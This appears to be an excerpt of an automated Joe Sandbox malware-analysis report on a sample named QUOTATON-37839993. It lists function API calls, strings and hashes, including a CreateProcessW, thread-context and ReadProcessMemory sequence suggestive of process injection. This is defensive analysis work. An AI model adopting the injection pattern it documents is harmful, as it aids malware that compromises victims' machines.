                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3942752672-1585850449
                                                                      • Opcode ID: ba16d56a970d4fd990245f47c40ba6bf1e2994cc6e71eacc32ba6ef2a587b1e7
                                                                      • Instruction ID: 7667f7aa47d475aec4423dce2dd39a6733844637f5074891fccf7eed7b647a49
                                                                      • Opcode Fuzzy Hash: ba16d56a970d4fd990245f47c40ba6bf1e2994cc6e71eacc32ba6ef2a587b1e7
                                                                      • Instruction Fuzzy Hash: D731B2B2408305AED324EB60DC45FDB77E8AF54304F10652EF685B20E1DB70A6C9CB92
                                                                      APIs
                                                                        • Part of subcall function 00E04DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E0F
                                                                      • _free.LIBCMT ref: 00E3E263
                                                                      • _free.LIBCMT ref: 00E3E2AA
                                                                        • Part of subcall function 00E06A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06BAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                      • API String ID: 2861923089-1757145024
                                                                      • Opcode ID: 4f0435e347cd2a7c249fabaf28b6c8f5579f657c4003c80ad0bc90c8caa7006b
                                                                      • Instruction ID: 1dc4c04619a657bcc2c1f38d24b30a796b34310601bbb0e361237ee990f05eda
                                                                      • Opcode Fuzzy Hash: 4f0435e347cd2a7c249fabaf28b6c8f5579f657c4003c80ad0bc90c8caa7006b
                                                                      • Instruction Fuzzy Hash: 14916C71910219AFCF08EFA4DC959EEBBB8FF04314F10642AE815BB2E1DB70A955CB50
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E035A1,SwapMouseButtons,00000004,?), ref: 00E035D4
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E035F5
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E03617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
                                                                      • Instruction ID: c9434271407363e0fde87fcafb8e679271f678304c5e6708ed28de990b04d98d
                                                                      • Opcode Fuzzy Hash: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
                                                                      • Instruction Fuzzy Hash: 4F114871510208BFDB20CF65EC409EEB7BCEF14744F1054A9E809E7250D6729E849760
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0104F2F3
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0104F389
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0104F3AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction ID: f4073bcd0879659508fbd8997765c58f4f5ec87a71b9db8f7ea9bd910394efe9
                                                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction Fuzzy Hash: 12621C70A14219DBEB24CFA8C850BDEB772FF58300F1091A9D14DEB2A4E7759E81CB59
                                                                      APIs
                                                                        • Part of subcall function 00E04EE5: _fseek.LIBCMT ref: 00E04EFD
                                                                        • Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69824
                                                                        • Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69837
                                                                      • _free.LIBCMT ref: 00E696A2
                                                                      • _free.LIBCMT ref: 00E696A9
                                                                      • _free.LIBCMT ref: 00E69714
                                                                        • Part of subcall function 00E22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29A24), ref: 00E22D69
                                                                        • Part of subcall function 00E22D55: GetLastError.KERNEL32(00000000,?,00E29A24), ref: 00E22D7B
                                                                      • _free.LIBCMT ref: 00E6971C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                      • String ID:
                                                                      • API String ID: 1552873950-0
                                                                      • Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                                      • Instruction ID: 44dfca6dc25fa1f38ef9ce382799c4e584f3c8112b9c323177094e31bdc8dccb
                                                                      • Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                                      • Instruction Fuzzy Hash: 88514CF1904219ABDF259FA4DC81A9EBBB9EF48300F10549EF209B7281DB715A90CF58
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                      • String ID:
                                                                      • API String ID: 2782032738-0
                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction ID: ba661823098bbd3f6f353be9af080e2816af7f7338e9528758d843e406acaac0
                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction Fuzzy Hash: 9241D7B5B007659BDB1CCF69E8809AE7BA5EF45364B24913EF825E76C0DB70DD408B40
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E044CF
                                                                        • Part of subcall function 00E0407C: _memset.LIBCMT ref: 00E040FC
                                                                        • Part of subcall function 00E0407C: _wcscpy.LIBCMT ref: 00E04150
                                                                        • Part of subcall function 00E0407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E04160
                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00E04524
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E04533
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E3D4B9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1378193009-0
                                                                      • Opcode ID: 80df52df5efb21d101ae41072209445c37f65a3fc97941a76b829dc933bf3ae3
                                                                      • Instruction ID: c524384499022d21cb623d663858601d3e36bb498aa622e26fddbcc50ac979b2
                                                                      • Opcode Fuzzy Hash: 80df52df5efb21d101ae41072209445c37f65a3fc97941a76b829dc933bf3ae3
                                                                      • Instruction Fuzzy Hash: 1721F8B1508794AFE7328B649C49BE6BFEC9B01318F04109EE79E761C1C37529C8C741
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: AU3!P/$EA06
                                                                      • API String ID: 4104443479-182974850
                                                                      • Opcode ID: a643fbc45271cb6859e73aaa89eb3fe1f4bc66027cd79ad542f9da52f2d5c33b
                                                                      • Instruction ID: fd417be1d21b28735132d1adb3827b56b50e769399a31e7b53cd36fa3e5a4a67
                                                                      • Opcode Fuzzy Hash: a643fbc45271cb6859e73aaa89eb3fe1f4bc66027cd79ad542f9da52f2d5c33b
                                                                      • Instruction Fuzzy Hash: 8941ACE2A0425867DF219B54DE917FE7FE29B55304F287065EE82BB2C2D6309DC183A1
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E3EA39
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00E3EA83
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                        • Part of subcall function 00E20791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E207B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                      • String ID: X
                                                                      • API String ID: 3777226403-3081909835
                                                                      • Opcode ID: ad1764d12f15c23ce41541836b4adfe9314c5506a8a8e2076ff4882aa019d1a6
                                                                      • Instruction ID: 58f02a45807fb9168d74228da403860e293de08d604c2da9758265f674d033a8
                                                                      • Opcode Fuzzy Hash: ad1764d12f15c23ce41541836b4adfe9314c5506a8a8e2076ff4882aa019d1a6
                                                                      • Instruction Fuzzy Hash: 4921C071A00258ABCB01DF94D846BEE7BFDAF48314F00505AE548BB381DBB46989CFA1
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C14,00EC52F8,?,?,?), ref: 00E1096E
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • _wcscat.LIBCMT ref: 00E44CB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FullNamePath_memmove_wcscat
                                                                      • String ID: S
                                                                      • API String ID: 257928180-3334745618
                                                                      • Opcode ID: 8a711e24c1eaa78e0a5b564b33c762b6d56ee3176d63c86e2204631b19cfdd0b
                                                                      • Instruction ID: b1269147658852f33123590b2f2a58bbbc45f0ec07efe9ac501c101890c0e4ce
                                                                      • Opcode Fuzzy Hash: 8a711e24c1eaa78e0a5b564b33c762b6d56ee3176d63c86e2204631b19cfdd0b
                                                                      • Instruction Fuzzy Hash: 9411A531A05208AACB40FB64CD46FDDB7E8AF88350B0064A5B988F7185EAB0A7C44B11
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00E698F8
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E6990F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
                                                                      • Instruction ID: a059de75ae4bb9bcac9f0b60529d6bbb394e36f6dcf4ce6d92c7bcbc7bd15350
                                                                      • Opcode Fuzzy Hash: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
                                                                      • Instruction Fuzzy Hash: 85D05E7954030DAFDB509BA0DC0EFDA773CE704701F4002B1FB98E11A1EAB095988B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b08f513d11716b9fd0496f679580f25e159afd1e5cb8a1e7b8e049db0c0768a
                                                                      • Instruction ID: 3150a5d71c427d41e779deeb5f71a24d7a4518af8e997c366895249a3f1a3839
                                                                      • Opcode Fuzzy Hash: 9b08f513d11716b9fd0496f679580f25e159afd1e5cb8a1e7b8e049db0c0768a
                                                                      • Instruction Fuzzy Hash: 86F13C716083019FC714DF28C484A6ABBE9FF88314F54992EF999AB352D730E945CF82
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E04370
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E04415
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E04432
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$_memset
                                                                      • String ID:
                                                                      • API String ID: 1505330794-0
                                                                      • Opcode ID: dda5891d275d1fe81db3a7c1e97e39a1cfe8c30364d8b2ec8883af30b6b66c41
                                                                      • Instruction ID: 4e3c89285ce63a9db1651f287fef464d4a9b4149f38347da2e2dbda73074aa4e
                                                                      • Opcode Fuzzy Hash: dda5891d275d1fe81db3a7c1e97e39a1cfe8c30364d8b2ec8883af30b6b66c41
                                                                      • Instruction Fuzzy Hash: 0231A0F15047018FD725DF64D984A9BBBF8FB58308F00192EF69AA22D1D771A988CB52
                                                                      APIs
                                                                      • __FF_MSGBANNER.LIBCMT ref: 00E25733
                                                                        • Part of subcall function 00E2A16B: __NMSG_WRITE.LIBCMT ref: 00E2A192
                                                                        • Part of subcall function 00E2A16B: __NMSG_WRITE.LIBCMT ref: 00E2A19C
                                                                      • __NMSG_WRITE.LIBCMT ref: 00E2573A
                                                                        • Part of subcall function 00E2A1C8: GetModuleFileNameW.KERNEL32(00000000,00EC33BA,00000104,?,00000001,00000000), ref: 00E2A25A
                                                                        • Part of subcall function 00E2A1C8: ___crtMessageBoxW.LIBCMT ref: 00E2A308
                                                                        • Part of subcall function 00E2309F: ___crtCorExitProcess.LIBCMT ref: 00E230A5
                                                                        • Part of subcall function 00E2309F: ExitProcess.KERNEL32 ref: 00E230AE
                                                                        • Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28
                                                                      • RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 1372826849-0
                                                                      • Opcode ID: 1133c3faae225f3ec4945bf15f0d77a595dbf84ca4bbc33f5f960ddb1ca6ef71
                                                                      • Instruction ID: 11e0b9146feb3e64d26a0387b046f1b71068b7b4a0c2f84f3d6452f4418714b7
                                                                      • Opcode Fuzzy Hash: 1133c3faae225f3ec4945bf15f0d77a595dbf84ca4bbc33f5f960ddb1ca6ef71
                                                                      • Instruction Fuzzy Hash: 9701F576281B31DFDA142735FD42A6E73C89B82765F10243BF415BB191DE708D014661
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E69548,?,?,?,?,?,00000004), ref: 00E698BB
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E69548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E698D1
                                                                      • CloseHandle.KERNEL32(00000000,?,00E69548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E698D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
                                                                      • Instruction ID: 60ea3d3ae715815977b3eb90ae76b010cf1336d7a5fffcfe4ee84fabd8397438
                                                                      • Opcode Fuzzy Hash: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
                                                                      • Instruction Fuzzy Hash: B9E08632181214BBD7212B95EC0DFDA7B19EB06765F104220FB58B90E1C7B115259798
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00E68D1B
                                                                        • Part of subcall function 00E22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29A24), ref: 00E22D69
                                                                        • Part of subcall function 00E22D55: GetLastError.KERNEL32(00000000,?,00E29A24), ref: 00E22D7B
                                                                      • _free.LIBCMT ref: 00E68D2C
                                                                      • _free.LIBCMT ref: 00E68D3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                      • Instruction ID: 542b0550c191539f8a61446e5a71269a78d3e3c8d36fb4fa1a4246417f162705
                                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                      • Instruction Fuzzy Hash: 08E012B164161157CB24A578BA40A9313DC4F5C3967142A1DB60DF7186CE64F8528174
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CALL
                                                                      • API String ID: 0-4196123274
                                                                      • Opcode ID: b596676b8ed4fe7d0a5c75d586a0e7af28534b96e109a4bd2e9f23cd0fda861b
                                                                      • Instruction ID: 717fb4d913ca38f737c0ac8f35f7f1734d71b72226701fe50060c075555472a5
